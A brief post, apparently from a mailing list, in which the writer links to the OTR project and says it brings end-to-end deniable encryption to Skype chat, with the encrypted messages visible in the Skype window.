 http://www.cypherpunks.ca/otr/

Et voilà, end-to-end deniable encryption for Skype chat messages.

The funny thing is that you can see the encrypted chat and key exchange
in the standard Skype messaging window, so you can verify yourself that
everything is enciphered.

Now I feel more comfortable and will sleep +10 minutes each night.

Cheers

Fabio/naif
